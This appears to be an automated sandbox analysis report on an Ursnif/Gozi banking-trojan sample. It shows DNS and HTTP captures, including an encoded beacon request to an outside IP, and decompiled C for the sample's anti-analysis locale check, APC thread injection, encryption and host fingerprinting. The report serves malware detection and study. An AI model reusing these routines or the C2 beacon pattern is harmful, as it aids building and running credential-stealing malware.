Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 14, 2023 12:26:09.669512987 CET	192.168.2.4	8.8.8.8	0x83d8	Standard query (0)	checklist.skype.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 14, 2023 12:26:09.698645115 CET	8.8.8.8	192.168.2.4	0x83d8	Name error (3)	checklist.skype.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

62.173.142.51

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49685	62.173.142.51	80	C:\Users\user\Desktop\server.exe

Timestamp	kBytes transferred	Direction	Data
Mar 14, 2023 12:27:29.882823944 CET	93	OUT	GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 62.173.142.51 Connection: Keep-Alive Cache-Control: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: server.exePID: 5596, Parent PID: 3528

General

Target ID:	0
Start time:	12:26:00
Start date:	14/03/2023
Path:	C:\Users\user\Desktop\server.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\server.exe
Imagebase:	0x400000
File size:	616960 bytes
MD5 hash:	43CFCE2E126B1BF5230E51EDD205F6BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: server.exePID: 5596, Parent PID: 3528COMMON

Executed Functions

Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004019F1() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D68();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012E6(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71);
						}
					} while (_v8 != 0);
					_t30 = E00401688(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4);
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012E6(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401BA9(_t66);
					goto L20;
				}
			}

0x004019f7
0x004019fc
0x00401a01
0x00401ba8
0x00401ba8
0x00401a0a
0x00401a0a
0x00401a0e
0x00401a11
0x00401a12
0x00401a18
0x00401a1c
0x00401a53
0x00401a1e
0x00401a26
0x00401a2c
0x00401a2e
0x00401a33
0x00401a39
0x00401a3b
0x00401a3b
0x00401a42
0x00401a48
0x00401a48
0x00401a4c
0x00401a4c
0x00401a5a
0x00401a61
0x00401a6a
0x00401a6d
0x00401a73
0x00401a76
0x00401a7f
0x00401ba4
0x00000000
0x00401ba6
0x00401a92
0x00401a95
0x00401a9d
0x00401a9f
0x00401aaa
0x00401ab2
0x00401ab2
0x00401ac0
0x00401b96
0x00401b96
0x00401b9c
0x00401b9e
0x00401b9e
0x00000000
0x00401ac6
0x00401ad1
0x00401b0f
0x00401b15
0x00401b27
0x00401b2d
0x00401b31
0x00401b8d
0x00401b93
0x00000000
0x00401b93
0x00401b3d
0x00401b4b
0x00401b53
0x00401b57
0x00401b5e
0x00401b61
0x00401b63
0x00401b63
0x00401b6b
0x00000000
0x00401b6d
0x00401b70
0x00401b76
0x00401b7b
0x00401b82
0x00401b82
0x00401b89
0x00000000
0x00401b89
0x00401b6b
0x00401ad3
0x00401ad8
0x00401adf
0x00401ae1
0x00401ae5
0x00401b07
0x00401b07
0x00000000
0x00401b07
0x00401ae7
0x00401aec
0x00401af1
0x00401af8
0x00000000
0x00000000
0x00401afd
0x00401b00
0x00000000
0x00401b00

APIs

Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB

Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
CreateThread.KERNEL32 ref: 00401B27
QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
GetLastError.KERNEL32(?,00000000), ref: 00401B4D
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
GetLastError.KERNEL32(?,00000000), ref: 00401B8D
GetLastError.KERNEL32(?,00000000), ref: 00401B9E

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 3475612337-0
Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1508 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02BD1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x2bda0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x2bda0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E02BD33DC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x2bda0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x2bda0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E02BD61DA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x02bd1511
0x02bd1517
0x02bd151a
0x02bd1520
0x02bd1520
0x02bd1522
0x02bd1524
0x02bd1527
0x02bd152d
0x02bd152e
0x02bd152f
0x02bd1535
0x02bd153a
0x02bd1540
0x02bd1548
0x02bd16a5
0x02bd154e
0x02bd1550
0x02bd1559
0x02bd155e
0x02bd1570
0x02bd1573
0x02bd1577
0x02bd157e
0x02bd1582
0x02bd158a
0x02bd1690
0x02bd1590
0x02bd1590
0x02bd1594
0x02bd1595
0x02bd1597
0x02bd15a2
0x02bd167c
0x02bd15a8
0x02bd15a8
0x02bd15ab
0x02bd15b1
0x02bd15b7
0x02bd15b7
0x02bd15bf
0x02bd15c1
0x02bd15c6
0x02bd166d
0x02bd15cc
0x02bd15d2
0x02bd15d5
0x02bd15d8
0x02bd15da
0x02bd15db
0x02bd15e0
0x02bd15e2
0x02bd15e2
0x02bd15ec
0x02bd15f1
0x02bd15f4
0x02bd15f7
0x02bd15f9
0x02bd1602
0x02bd162c
0x02bd1604
0x02bd1615
0x02bd1615
0x02bd1634
0x00000000
0x00000000
0x02bd1636
0x02bd1639
0x02bd163c
0x02bd1640
0x00000000
0x02bd1642
0x02bd1651
0x02bd1657
0x02bd165f
0x02bd165f
0x00000000
0x02bd1640
0x02bd1644
0x02bd164a
0x02bd164f
0x02bd1666
0x00000000
0x00000000
0x00000000
0x02bd164f
0x02bd15c6
0x02bd167f
0x02bd1682
0x02bd1682
0x02bd1697
0x02bd1697
0x02bd16af

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02BD5088,00000001,02BD3ECE,00000000), ref: 02BD1540
memcpy.NTDLL(02BD5088,02BD3ECE,00000010,?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740), ref: 02BD1559
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02BD1582
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02BD159A
memcpy.NTDLL(00000000,775EC740,035B9600,00000010), ref: 02BD15EC
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,035B9600,00000020,?,?,00000010), ref: 02BD1615
GetLastError.KERNEL32(?,?,00000010), ref: 02BD1644
GetLastError.KERNEL32 ref: 02BD1676
CryptDestroyKey.ADVAPI32(00000000), ref: 02BD1682
GetLastError.KERNEL32 ref: 02BD168A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02BD1697
GetLastError.KERNEL32(?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD169F

Strings

@MqtNqt, xrefs: 02BD1644, 02BD1676, 02BD168A, 02BD169F

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MqtNqt
API String ID: 3401600162-2883916605
Opcode ID: 5e57371814cadc3560f6e17846130e75240b1e85970ab3c0297df470325a6df4
Instruction ID: 7876f54e6f983a28370125d5553273fdbd7e211a4f193f72fc52d9e81be953f7
Opcode Fuzzy Hash: 5e57371814cadc3560f6e17846130e75240b1e85970ab3c0297df470325a6df4
Instruction Fuzzy Hash: 5F513AB5910209AFDB10DFA8D884AEE7BB9FB08354F0484A9F919E7140E7748A54DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3BD3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02BD3BD3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2bda310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02BD71CD( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2bda344 ^ 0x6c7261ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2bda2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02BD56B9(_v8 + _v8, _t64);
							}
							HeapFree( *0x2bda2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2bda2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BD56B9(_v8 + _v8, _t64);
						}
						HeapFree( *0x2bda2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02bd3bd3
0x02bd3bdb
0x02bd3bdf
0x02bd3be2
0x02bd3be7
0x02bd3be9
0x02bd3bee
0x02bd3bee
0x02bd3bf4
0x02bd3bf6
0x02bd3c03
0x02bd3c64
0x02bd3c05
0x02bd3c0a
0x02bd3c10
0x02bd3c15
0x02bd3c23
0x02bd3c27
0x02bd3c36
0x02bd3c3d
0x02bd3c44
0x02bd3c44
0x02bd3c4f
0x02bd3c4f
0x02bd3c27
0x02bd3c15
0x02bd3c66
0x02bd3c6c
0x02bd3c76
0x02bd3c78
0x02bd3c7d
0x02bd3c8c
0x02bd3c90
0x02bd3c9b
0x02bd3ca2
0x02bd3ca9
0x02bd3ca9
0x02bd3cb5
0x02bd3cb5
0x02bd3c90
0x02bd3cc0
0x02bd3cc2
0x02bd3cc5
0x02bd3cc7
0x02bd3cca
0x02bd3ccd
0x02bd3cd7
0x02bd3cdb
0x02bd3cdf

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02BD3C0A
RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD3C21
GetUserNameW.ADVAPI32(00000000,?), ref: 02BD3C2E
HeapFree.KERNEL32(00000000,00000000), ref: 02BD3C4F
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD3C76
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BD3C8A
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD3C97
HeapFree.KERNEL32(00000000,00000000), ref: 02BD3CB5

Strings

Uqt, xrefs: 02BD3C4F, 02BD3CB5

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uqt
API String ID: 3239747167-2320327147
Opcode ID: c1bc944aa7623993474abd3cdbc34e8f615d9841ab7d6cde6cd01b0b32b6f0e7
Instruction ID: 2480b4316a7db016568c5e7c833c63049feace692ef17a81b2fc301da8dcb887
Opcode Fuzzy Hash: c1bc944aa7623993474abd3cdbc34e8f615d9841ab7d6cde6cd01b0b32b6f0e7
Instruction Fuzzy Hash: E4312871A01205AFDB10DFA9DD81AAAB7F9EB48240F6488A9E544D3211F730EA549F51

Uniqueness

Uniqueness Score: -1.00%

Function 02BD421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E02BD421F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02BD33DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02BD61DA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02bd422c
0x02bd422d
0x02bd422e
0x02bd422f
0x02bd4230
0x02bd4234
0x02bd423b
0x02bd424a
0x02bd424d
0x02bd4250
0x02bd4257
0x02bd425a
0x02bd425d
0x02bd4260
0x02bd4263
0x02bd426e
0x02bd4270
0x02bd4279
0x02bd4281
0x02bd4283
0x02bd4295
0x02bd429f
0x02bd42a3
0x02bd42b2
0x02bd42b6
0x02bd42bf
0x02bd42c7
0x02bd42c7
0x02bd42c9
0x02bd42c9
0x02bd42d1
0x02bd42d7
0x02bd42db
0x02bd42db
0x02bd42e6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BD4266
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BD4279
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD4295

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD42B2
memcpy.NTDLL(?,00000000,0000001C), ref: 02BD42BF
NtClose.NTDLL(?), ref: 02BD42D1
NtClose.NTDLL(00000000), ref: 02BD42DB

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 51a8f5c30c52e80b2b9bcdd018a42bf270969bcc12a6a093c37cff1ed4ae12b4
Instruction ID: 8ba244f61077cc4b0ccf4d404632767e4614017592a4a9c3e648fae07cd62bc6
Opcode Fuzzy Hash: 51a8f5c30c52e80b2b9bcdd018a42bf270969bcc12a6a093c37cff1ed4ae12b4
Instruction Fuzzy Hash: 1F2116B2911228BBDB019FA5DC85EDEBFBDEF08750F104062F905E6110E7718A549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402026();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x4051ca);
				_push(_t15 + 0x4051c0);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402020();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x004015b0
0x004015b9
0x004015bd
0x004015c3
0x004015c8
0x004015cd
0x004015d0
0x004015d3
0x004015d8
0x004015d9
0x004015dc
0x004015e7
0x004015ee
0x004015f2
0x004015f4
0x004015f5
0x004015f8
0x004015fd
0x00401607
0x00401609
0x00401609
0x0040161d
0x00401623
0x00401627
0x00401677
0x00401629
0x00401632
0x00401648
0x00401650
0x00401662
0x00401666
0x00000000
0x00000000
0x00401652
0x00401655
0x0040165a
0x0040165c
0x0040165c
0x0040163d
0x0040163f
0x00401668
0x00401669
0x00401669
0x00401632
0x0040167f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671

Memory Dump Source

